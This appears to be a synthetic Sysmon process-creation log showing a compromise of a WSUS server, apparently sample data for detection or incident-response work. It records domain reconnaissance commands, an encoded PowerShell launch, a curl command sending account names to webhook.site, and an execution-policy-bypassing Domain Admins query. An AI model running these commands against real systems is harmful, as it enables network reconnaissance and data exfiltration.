EventRecordID: 2345542
EventID: 1 (Process Create) | Version: 5 | Level: 4 | Task: 1 | Opcode: 0 | Keywords: 0x8000000000000000
Channel: Microsoft-Windows-Sysmon/Operational
Computer: wsus-srv-01.contoso.local
RuleName: -
UtcTime: 2025-10-23 23:34:12.551
ProcessGuid: {A10B94A8-FA11-814A-3705-00000000C001}
ProcessId: 8404
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\Windows\system32\cmd.exe
CurrentDirectory: C:\Program Files\Update Services\WebServices\
User: NT AUTHORITY\SYSTEM
LogonGuid: {A10B94A8-A38E-814A-E703-000000000000}
LogonId: 0x3e7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A
ParentProcessGuid: {A10B94A8-A45C-814A-3701-00000000C001}
ParentProcessId: 3268
ParentImage: C:\Program Files\Update Services\Services\wsusservice.exe
ParentCommandLine: "C:\Program Files\Update Services\Services\wsusservice.exe"

EventRecordID: 2345543
EventID: 1 (Process Create) | Version: 5 | Level: 4 | Task: 1 | Opcode: 0 | Keywords: 0x8000000000000000
Channel: Microsoft-Windows-Sysmon/Operational
Computer: wsus-srv-01.contoso.local
RuleName: -
UtcTime: 2025-10-23 23:34:12.753
ProcessGuid: {A10B94A8-FA18-814A-4206-00000000C001}
ProcessId: 8612
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\Windows\system32\cmd.exe /c "whoami;net user /domain; ipconfig /all"
CurrentDirectory: C:\Program Files\Update Services\WebServices\
User: NT AUTHORITY\SYSTEM
LogonGuid: {A10B94A8-A38E-814A-E703-000000000000}
LogonId: 0x3e7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A
ParentProcessGuid: {A10B94A8-FA11-814A-3705-00000000C001}
ParentProcessId: 8404
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\Windows\system32\cmd.exe

EventRecordID: 2345544
EventID: 1 (Process Create) | Version: 5 | Level: 4 | Task: 1 | Opcode: 0 | Keywords: 0x8000000000000000
Channel: Microsoft-Windows-Sysmon/Operational
Computer: wsus-srv-01.contoso.local
RuleName: -
UtcTime: 2025-10-23 23:34:13.154
ProcessGuid: {A10B94A8-FA2F-814A-4C05-00000000C001}
ProcessId: 9144
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe -ec 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
CurrentDirectory: C:\Program Files\Update Services\WebServices\
User: NT AUTHORITY\SYSTEM
LogonGuid: {A10B94A8-A38E-814A-E703-000000000000}
LogonId: 0x3e7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=A8FDBA9DF15E41B6F5C69C79F66A26A9D48E174F9E7018A371600B866867DAD8,IMPHASH=F2A5A5A4C57DEFD99B6B8F4C6F6F0B6C
ParentProcessGuid: {A10B94A8-FA18-814A-4206-00000000C001}
ParentProcessId: 8612
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\Windows\system32\cmd.exe /c "whoami;net user /domain; ipconfig /all"

EventRecordID: 2345545
EventID: 1 (Process Create) | Version: 5 | Level: 4 | Task: 1 | Opcode: 0 | Keywords: 0x8000000000000000
Channel: Microsoft-Windows-Sysmon/Operational
Computer: wsus-srv-01.contoso.local
RuleName: -
UtcTime: 2025-10-23 23:34:18.821
ProcessGuid: {A10B94A8-FA55-814A-5D06-00000000C001}
ProcessId: 9872
Image: C:\Windows\System32\curl.exe
FileVersion: 7.83.1.0
Description: curl command line tool
Product: The curl executable
Company: curl, https://curl.se/
OriginalFileName: curl.exe
CommandLine: curl.exe -k http://webhook.site/12345678 --data-binary "nt authority\system contoso\admin1 contoso\admin2"
CurrentDirectory: C:\Program Files\Update Services\WebServices\
User: NT AUTHORITY\SYSTEM
LogonGuid: {A10B94A8-A38E-814A-E703-000000000000}
LogonId: 0x3e7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: MD5=88AB26F1C12D45F24D7A5DFC22AA9CB5,SHA256=E4A4B3C5D6A7F8E9B0C1D2E3F4A5B6C7D8E9F0A1B2C3D4E5F6A7B8C9D0E1F2A3,IMPHASH=0D09A8F7C6E5B4D3A2C1B0A9D8E7F6C5
ParentProcessGuid: {A10B94A8-FA2F-814A-4C05-00000000C001}
ParentProcessId: 9144
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell.exe -ec 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

EventRecordID: 2345546
EventID: 1 (Process Create) | Version: 5 | Level: 4 | Task: 1 | Opcode: 0 | Keywords: 0x8000000000000000
Channel: Microsoft-Windows-Sysmon/Operational
Computer: wsus-srv-01.contoso.local
RuleName: -
UtcTime: 2025-10-23 23:35:45.125
ProcessGuid: {A10B94A8-FB11-814A-7E08-00000000C001}
ProcessId: 10256
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\Windows\system32\cmd.exe
CurrentDirectory: C:\Windows\System32\inetsrv\
User: NT AUTHORITY\NETWORK SERVICE
LogonGuid: {A10B94A8-A391-814A-E714-000000000000}
LogonId: 0x14e7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A
ParentProcessGuid: {A10B94A8-A47E-814A-4802-00000000C001}
ParentProcessId: 4512
ParentImage: C:\Windows\System32\inetsrv\w3wp.exe
ParentCommandLine: c:\windows\system32\inetsrv\w3wp.exe -ap "WsusPool" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipm8530-wsus -h "C:\inetpub\temp\apppools\WsusPool\WsusPool.config" -w "" -m 0

EventRecordID: 2345547
EventID: 1 (Process Create) | Version: 5 | Level: 4 | Task: 1 | Opcode: 0 | Keywords: 0x8000000000000000
Channel: Microsoft-Windows-Sysmon/Operational
Computer: wsus-srv-01.contoso.local
RuleName: -
UtcTime: 2025-10-23 23:35:45.890
ProcessGuid: {A10B94A8-FB23-814A-8F09-00000000C001}
ProcessId: 10788
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.17763.1 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell.exe -ExecutionPolicy Bypass -Command "net group 'Domain Admins' /domain; Get-WmiObject -Class Win32_ComputerSystem"
CurrentDirectory: C:\Windows\System32\inetsrv\
User: NT AUTHORITY\NETWORK SERVICE
LogonGuid: {A10B94A8-A391-814A-E714-000000000000}
LogonId: 0x14e7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=A8FDBA9DF15E41B6F5C69C79F66A26A9D48E174F9E7018A371600B866867DAD8,IMPHASH=F2A5A5A4C57DEFD99B6B8F4C6F6F0B6C
ParentProcessGuid: {A10B94A8-FB11-814A-7E08-00000000C001}
ParentProcessId: 10256
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\Windows\system32\cmd.exe